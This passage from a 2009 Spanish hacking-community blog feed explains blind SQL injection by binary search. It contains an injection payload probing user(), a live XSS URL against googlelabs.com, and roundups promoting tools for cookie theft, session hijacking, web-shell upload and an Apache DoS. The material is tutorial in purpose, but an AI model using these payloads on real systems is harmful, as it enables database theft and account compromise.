class="br0">&#40;</span><span class="kw1">SELECT</span><span class="sy0">+</span><span class="kw1">IF</span><span class="br0">&#40;</span><span class="br0">&#40;</span><span class="kw1">SELECT</span><span class="sy0">+</span>case<span class="sy0">+</span><span class="br0">&#40;</span>ascii<span class="br0">&#40;</span>mid<span class="br0">&#40;</span><span class="br0">&#40;</span><span class="kw1">SELECT</span><span class="sy0">+</span>user<span class="br0">&#40;</span><span class="br0">&#41;</span><span class="br0">&#41;</span><span class="sy0">,</span>1<span class="sy0">,</span>1<span class="br0">&#41;</span><span class="br0">&#41;</span><span class="sy0">+</span><span class="kw1">BETWEEN</span><span class="sy0">+</span>32<span class="sy0">+</span><span class="kw1">AND</span><span class="sy0">+</span>122<span class="br0">&#41;</span><span class="sy0">+</span>when<span class="sy0">+</span>true<span class="sy0">+</span>then<span class="sy0">+</span><span class="br0">&#40;</span>true<span class="br0">&#41;</span><span class="sy0">+</span>else<span class="sy0">+</span>false<span class="sy0">+</span>end<span class="br0">&#41;</span><span class="sy0">,</span><span class="br0">&#40;</span><span class="kw1">SELECT</span><span class="sy0">+</span>case<span class="sy0">+</span><span class="br0">&#40;</span>ascii<span class="br0">&#40;</span>mid<span class="br0">&#40;</span><span class="br0">&#40;</span><span class="kw1">SELECT</span><span class="sy0">+</span>user<span class="br0">&#40;</span><span class="br0">&#41;</span><span class="br0">&#41;</span><span class="sy0">,</span>1<span class="sy0">,</span>1<span class="br0">&#41;</span><span class="br0">&#41;</span><span class="sy0">+</span><span class="kw1">BETWEEN</span><span class="sy0">+</span>32<span class="sy0">+</span><span class="kw1">AND</span><span class="sy0">+</span><span class="nu0">77</span><span class="br0">&#41;</span><span class="sy0">+</span>when<span class="sy0">+</span>true<span class="sy0">+</span>then<span class="sy0">+</span><span class="br0">&#40;</span>true<span class="br0">&#41;</span><span class="sy0">+</span>else<span class="sy0">+</span>false<span class="sy0">+</span>end<span class="br0">&#41;</span><span class="sy0">,</span>false<span class="br0">&#41;</span><span class="br0">&#41;</span><span class="co1">--</span></pre></div></div>
<p><strong>Explicacion :</strong></p>
<p>Buscaremos el Primer valor de la consulta &#8220;select user()&#8221;, el cual es A, (Ascii: 65), primero consultaremos si el  valor esta entre 32-122 [Space-z], si este resulta verdadero entonces retonara TRUE , o por el contrario si no esta dentro del rango 32-122 retornara<strong> FALSE.</strong></p>
<p>Si el valor  retornado por la primera consulta es <strong>TRUE</strong> , entonces consultara si el primer valor esta entre 32-77 [Space-M], si esto es verdadero retornara<strong> TRUE</strong>, por el contrario retonara <strong>FALSE</strong> y el valor estaria entre 72-122[M-z].</p>
<p>En Esta  Consulta Reducimos Nuestras alternativas de 90 a 45.</p>
<p><strong>¿Podrías Adivinar que Estado Retornara la Consulta , Si el valor a Buscar es 64?</strong></p>
<ul>
<li>Si Pensaste en <strong>TRUE</strong>, estas en lo Correcto.</li>
</ul>
<p>Luego En la Segunda vuelta , el  rango que se encuentre dentro del valor a buscar (en este caso 32-77), se convertirá en nuestro arreglo, y se dividirá en 2<strong> ([32-54]-[55-77]),</strong> así sucesivamente, hasta encontrar el valor final, <span style="color: #ff0000;"><strong>en solo 7 consultas.</strong></span><br />
<strong>Grafica :</strong><br />
<strong><a href="http://undersecurity.net/wp-content/uploads/2009/07/tablaA.png">Tamaño Completo</a></strong></p>
<p><em>(Solo Muestra el Rango desde 32-77)</em></p>
<p><img class="alignnone size-large wp-image-57" title="tablaA" src="http://undersecurity.net/wp-content/uploads/2009/07/tablaA-1024x229.png" alt="tablaA" width="819" height="183" /></p>
<p>Para Demostrar Esta Metodología Desarrolle un Pequeño Programa que solamente muestra 1 carácter,  en 7 peticiones.</p>
<p><strong>Aclaro :  Es un PoC en Php. </strong></p>
<p><strong>Posteriormente dentro del Lab de Undersecurity.net Se desarrollara la Tool Completa.</strong></p>
<p><strong>Imagen : </strong></p>
<p><img class="alignleft" title="Ejemplo" src="http://www.ubuntu-pics.de/bild/18023/screenshot_117_avd8Uq.png" alt="" width="1020" height="290" /></p>
<p>Código del POC Llamado <strong>BlindD00l:</strong></p>
<h2><span style="color: #ff0000;"><a href="http://lib.undersecurity.net/index.php?download=./Lab/BLIND00L_SOURCE.txt">Descargar Blind00l</a></span></h2>
<ul>
<li>Testeado En Mysql 5.x</li>
<li>Curl Activado</li>
</ul>
<p>Gracias a toda la Comunidad Undersecurity.net</p>
<ul>
<li>Cic4tr1z : logística Infinita</li>
<li>Nork : Correcciones y Apoyo en ideas extravagantes.</li>
<li>1995: Apoyo Incondicional.</li>
<li>N0b0dy :Notable y leal animo a la comunidad.</li>
<li>Lix : Por ser Simplemente Lix.</li>
<li>y A muchos mas que quedaron en el camino.</li>
</ul>
<p>#OzX [Undersecurity.net]</p>
]]></content:encoded>
			<wfw:commentRss>http://undersecurity.net/blind-sql-injection/busqueda-binaria-aplicada-a-las-blind-sql-injection/feed</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>Recopilación semanal</title>
		<link>http://undersecurity.net/noticias-undersecurity/recopilacion-semanal</link>
		<comments>http://undersecurity.net/noticias-undersecurity/recopilacion-semanal#comments</comments>
		<pubDate>Sun, 05 Jul 2009 20:06:58 +0000</pubDate>
		<dc:creator>Nork</dc:creator>
				<category><![CDATA[Noticias UnderSecurity]]></category>

		<guid isPermaLink="false">http://undersecurity.net/?p=20</guid>
		<description><![CDATA[Pues como será habitual ahora, hago una recopilación de temas para que así nadie se pierda nada.
Primeramente añadiré unos que deberían haber estado en el post anterior y que se me pasó (gracias Lix   ) y luego pondré los demás.
 Vulnerabilidad en la fijación de sesión (Session Fixation)
SH4V nos deja un artículo sobre [...]]]></description>
			<content:encoded><![CDATA[<p>Pues como será habitual ahora, hago una recopilación de temas para que así nadie se pierda nada.</p>
<p>Primeramente añadiré unos que deberían haber estado en el post anterior y que se me pasó (gracias Lix <img src='http://undersecurity.net/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' />  ) y luego pondré los demás.</p>
<p><small><strong> </strong></small><a href="http://foro.undersecurity.net/read.php?15,1542,1733" target="_blank"><strong><small><strong>Vulnerabilidad en la fijación de sesión (Session Fixation)</strong></small></strong></a></p>
<p>SH4V nos deja un artículo sobre como robar las sesiones mediante el uso de la vulnerabilidad Session Fixation. Una razón de más para usar el zorro y a NoScript (L)</p>
<p><small><strong> </strong></small><strong><small><strong><a href="http://foro.undersecurity.net/read.php?32,793,799" target="_blank">Rastreo y exploración de sistemas</a></strong></small></strong></p>
<p>Dejo la introducción que elaboró SH4V para su artículo:</p>
<blockquote><p><em>En esta guía vamos a aprender técnicas y métodos de exploración de redes y sistemas. Veremos métodos para identificar estaciones de trabajo de una red, métodos de rastreo estándar como vainilla conect() y SYN medio abierto, métodos sigilosos de rastreo (indicador de TCP inverso, indicador ACK), métodos anónimos (rastreo de rebote FTP, rastreo de rebote en Proxy) y rastreo de puertos UDP. Pensaba incluir también una técnica silenciosa para enumerar servicios utilizando zombies, pero debido a la extensión y a las posibilidades que ofrece, se dejará para más adelante, ya que no daría tiempo a explicarla como se merece en este how-to.</em></p></blockquote>
<p><strong><small><strong><a href="http://foro.undersecurity.net/read.php?55,79,79#msg-79">HTTP al descubierto</a></strong></small></strong></p>
<p>Todo el mundo hace un uso del protocolo HTTP  pero menos gente conoce bien como éste trabaja. En este artículo Lix nos enseña un poco más sobre HTTP y sus características <img src='http://undersecurity.net/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
<p><strong><small><strong><a href="http://foro.undersecurity.net/read.php?32,852,853" target="_blank">Matando el domingo con Reverse engineering..</a></strong></small></strong></p>
<p>n0b0dy nos vuelve a recordar la fuerza de la curiosidad y lo importante que es en el avance de esta área.</p>
<p>El texto muestra el proceso que siguió para descifrar una shell c99 la cual tenía unas características que le llamaron la atención. En este artículo nuestro compañero nos brinda un artículo ingenioso y de calidad.</p>
<p><strong><small><strong><a href="http://foro.undersecurity.net/read.php?10,2949" target="_blank">Como extraer un email de un texto</a></strong></small></strong></p>
<p>Este hilo no es ningún artículo en concreto pero no por ello no puede estar aquí. Un user hizo una pregunta sobre como extraer cierta información de un texto a lo que le respondieron con una solución mediante EXPRESIONES REGULARES. Las expresiones regulares es un tema muy curioso y no fácil de controlar y en este hilo podemos ver soluciones prácticas y eficientes.</p>
<p><strong><small><strong><a href="http://foro.undersecurity.net/read.php?16,3097" target="_blank">Componente com_zoom (joomla) Blind SQL Injection</a></strong></small></strong></p>
<p>1995 (AKA el chico avance <img src='http://undersecurity.net/wp-includes/images/smilies/icon_razz.gif' alt=':P' class='wp-smiley' /> ) nos muestra una vulnerabilidad Blind SQLI en un componente de joomla.</p>
<p><strong><small><strong><a href="http://foro.undersecurity.net/read.php?41,3030,3076" target="_blank">Ruby Session Grinder Hijacker v. 1.0</a></strong></small></strong></p>
<p>Sh4V comparte con nosotros una herramienta para intentar interceptar sesiones. A partir de aquí se genera una serie de comentarios muy interesantes sobre esta área.  Hay que destacar el análisis que ha hecho C1c sobre la generación de las sesiones en PHP.</p>
<p>&#8212;-</p>
<p>Recordamos que en el blog se pondrán las ideas y proyectos surgidos en US así que animo a la gente a participar y a escribir sus propios artículos!!</p>
<p>Saludos y un fuerte abrazo!</p>
<p><strong>~UNDERSECURITY</strong></p>
<p><strong><br />
</strong></p>
]]></content:encoded>
			<wfw:commentRss>http://undersecurity.net/noticias-undersecurity/recopilacion-semanal/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Temas interesantes a tener en cuenta.</title>
		<link>http://undersecurity.net/noticias-undersecurity/temas-interesantes-a-tener-en-cuenta</link>
		<comments>http://undersecurity.net/noticias-undersecurity/temas-interesantes-a-tener-en-cuenta#comments</comments>
		<pubDate>Sat, 27 Jun 2009 14:06:46 +0000</pubDate>
		<dc:creator>Nork</dc:creator>
				<category><![CDATA[Noticias UnderSecurity]]></category>

		<guid isPermaLink="false">http://undersecurity.net/?p=12</guid>
		<description><![CDATA[Hola a todos, como se comentó en el hilo que anunciaba la apertura del blog, se expondrá los proyectos que nazcan y sean de la comunidad así como también los mejores post para recogerlos y que no os perdáis ningún dato interesante.
Destacamos pues:

SQLI Input Ripper 0.1 ( SIR ) 
Se trata de un script en [...]]]></description>
			<content:encoded><![CDATA[<p>Hola a todos, como se comentó en el hilo que anunciaba la apertura del blog, se expondrá los proyectos que nazcan y sean de la comunidad así como también los mejores post para recogerlos y que no os perdáis ningún dato interesante.</p>
<p>Destacamos pues:<br />
<strong><br />
<a href="http://foro.undersecurity.net/read.php?23,1102" target="_blank">SQLI Input Ripper 0.1 ( SIR ) </a></strong></p>
<p>Se trata de un script en php que optimiza ENORMEMENTE el análisis de vulnerabilidades SQLI. Se le introduce como parámetro un archivo de texto donde están las webs a analizar y éste buscará los posibles inputs vulnerables de las páginas. Lo mejor de todo? Que hace una excelente combinación con nuestro Reverse DNS ya que éste analiza las DNS alojadas en un mismo servidor y te las vuelca en un archivo de texto el cual puedes pasarle a SIR y así en pocos minutos tienes un análisis completo de TODO un servidor.</p>
<p>Gracias a nuestro hermano Oz!!</p>
<p><strong><a href="http://foro.undersecurity.net/read.php?23,816" target="_blank">NBNSCRIPT &#8211; Robando cookies envenenando dominios inexistentes por netbios</a></strong></p>
<p>El amigo hkm publicó en US un script para robar cookies de una manera bastante original. Éste script redirecciona los dominios y subdominios inexistentes a una página la cual cogerá las cookies. De que sirve tener cookies de dominios inexistentes? Pues aquí entra en juego la creatividad que tubo hkm, la página que recoge las cookies contiene unos iframes que van dirigios a sub/dominios inexistentes pero que la DNS es resuelta a la página original: &#8220;0.google.com, 0.live.com, -hi5.com, .facebook.com&#8230;&#8221; por lo que de esta manera obtendremos la cookie de la página original <img src='http://undersecurity.net/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> . Buena esa, eh? <img src='http://undersecurity.net/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /><br />
<strong><br />
<a href="http://foro.undersecurity.net/read.php?15,2876" target="_blank">apache_dos.c &#8211; Apache D.O.S proof-of-concept</a></strong></p>
<p>C1c4Tr1Z nos trae un POC sobre un tema tratado en milw0rm el cual provoca, en cierta medida, un D.O.S al apache. Él mismo anuncia que está estudiando la forma de combatir estos ataques. Yo me mantendría al tanto, no? <img src='http://undersecurity.net/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
<p><strong><a href="http://foro.undersecurity.net/read.php?15,2351" target="_blank">Tutorial Subir Web Shell a Joomla y Mambo </a></strong></p>
<p>El viejo amigo 1995 nos deleita con un how-to para subir una shell a sistemas joomla y mambo. Recomiendo encarecidamente echarle un vistazo <img src='http://undersecurity.net/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
<p><strong><a href="http://foro.undersecurity.net/read.php?23,968" target="_blank">YASBU 0.1 (SQL INJECTIONS TOOLS) </a></strong></p>
<p>Más o menos todos los que ya lleváis un tiempo sabréis de que os hablo cuando digo YASBU. Se trata de un proyecto que optimiza las inyecciones SQL para extraer automáticamente los datos sensibles de una BD. Todo ésto lo hace bajo una interfaz amable e intuitiva. A parte, tenéis un vídeo que os facilitará el uso.</p>
<p>Mencionar también que a quien le interese este proyecto puede contribuir a su versión 0.2. Podéis discutir sobre este aspecto en http://foro.undersecurity.net/read.php?23,1241<br />
<a href="http://foro.undersecurity.net/read.php?23,255" target="_blank"><br />
<strong>PHPSHELL UnderSecurity</strong></a></p>
<p>Aunque este proyecto no esté acabado me gustaría darle publicidad a ver si entre todos se puede conseguir el propósito. Ya hay una idea como base y unos códigos de ejemplos para quien quiera continuarlo.</p>
<p>Os animo a que participéis!!!<br />
<strong><br />
<a href="http://foro.undersecurity.net/read.php?32,838" target="_blank">Correo Electrónico [SMTP | POP | IMAP ~ CIFRADO Y SEGURIDAD]</a></strong></p>
<p>SH4V se trabajó una guía sobre correo electrónico, dando una explicación detallada junto con ejemplos prácticos. Sin duda es una guía que merece ser leída <img src='http://undersecurity.net/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /><br />
<strong><br />
<a href="http://foro.undersecurity.net/read.php?32,813" target="_blank">LFI, explicacion basica&#8230;</a></strong></p>
<p>El MC n0b0dy ( haha <img src='http://undersecurity.net/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> ) explica, para todo aquel que no sabe que es un LFI, en que consiste y como se explota esta vulnerabilidad. Como todo lo que estoy poniendo aquí, merece ser leído ^^<br />
<strong><br />
<a href="http://foro.undersecurity.net/read.php?32,1086" target="_blank">Consultas Avanzadas a servidores DNS </a></strong></p>
<p>Otro gran artículo de SH4V, que como el título dice sirve para sacar información importante de los servidores DNS. Como es normal en él usa una explicación detallada y ejemplos prácticos.</p>
<p><strong>Como vulnerabilidad</strong> únicamente citar un<strong> XSS del gigante GOOGLE</strong> (podéis mirar todo el trabajo que han hecho los users en este aspecto <a href="http://foro.undersecurity.net/list.php?47" target="_blank">AQUÍ</a>):</p>
<p><em>http://www.googlelabs.com/?q=%3Cscript%3Ealert(/xss/)%3C/script%3E&amp;apps=Search+Labs</em></p>
<p><a href="http://foro.undersecurity.net/read.php?47,2893" target="_blank">Donde iter lo anunciaba</a></p>
<p>Pido disculpas si me he olvidado de mostrar algún otro post interesante, dado que desde el inicio en US se ha cultivado MUCHA información de calidad. Por esto aconsejo a todo el que lea el blog a participar en la comunidad y comprobar por él mismo el buen ambiente y calidad que poco a poco estamos cogiendo.</p>
<p>Semanalmente iremos añadiendo una recopilación con los temas más importantes que se han creado en el foro. Así que ya sabéis!!</p>
<p>Un saludo departe de todo el equipo y gracias por estar con nosotros en nuestro camino!</p>
<p><strong>~UNDER SECURITY</strong></p>
]]></content:encoded>
			<wfw:commentRss>http://undersecurity.net/noticias-undersecurity/temas-interesantes-a-tener-en-cuenta/feed</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>Bienvenidos</title>
		<link>http://undersecurity.net/noticias-undersecurity/bienvenidos</link>
		<comments>http://undersecurity.net/noticias-undersecurity/bienvenidos#comments</comments>
		<pubDate>Thu, 25 Jun 2009 01:29:24 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Noticias UnderSecurity]]></category>

		<guid isPermaLink="false">http://undersecurity.net/?p=1</guid>
		<description><![CDATA[&#8220;No, no lo intentes. Hazlo, o no lo hagas, pero no lo intentes.&#8220;, con esta frase del maestro Yoda, he querido comenzar esta bienvenida, UnderSecurity comunidad con apróximandamente 500 usuarios registrados y más de 2.200 post en su foro creado hace aproximadamente ocho meses, ha destacado desde sus inicios (New-Bytes.net) como una de las comunidades [...]]]></description>
			<content:encoded><![CDATA[<p>&#8220;<em><strong>No, no lo intentes. Hazlo, o no lo hagas, pero no lo intentes.</strong></em>&#8220;, con esta frase del maestro Yoda, he querido comenzar esta bienvenida, UnderSecurity comunidad con apróximandamente 500 usuarios registrados y más de 2.200 post en su foro creado hace aproximadamente ocho meses, ha destacado desde sus inicios (New-Bytes.net) como una de las comunidades de Habla Hispana que posee una gran Calidad de contenido, por favorecer el Aprendimiento mutuo, reconociendo de esta forma que para nosotros, la información y el conocimiento (poder) deben desarrollarse y mantenerse en conjunto, respetando a los demás. </p>
<p>Bajo estos conceptos UnderSecurity crece día día, con el apoyo de todos sus integrantes, personas de más de 10 paises, las cuales se esfuerzan continuamente, para hacer de ésta, una mejor comunidad.</p>
]]></content:encoded>
			<wfw:commentRss>http://undersecurity.net/noticias-undersecurity/bienvenidos/feed</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
	</channel>
</rss>
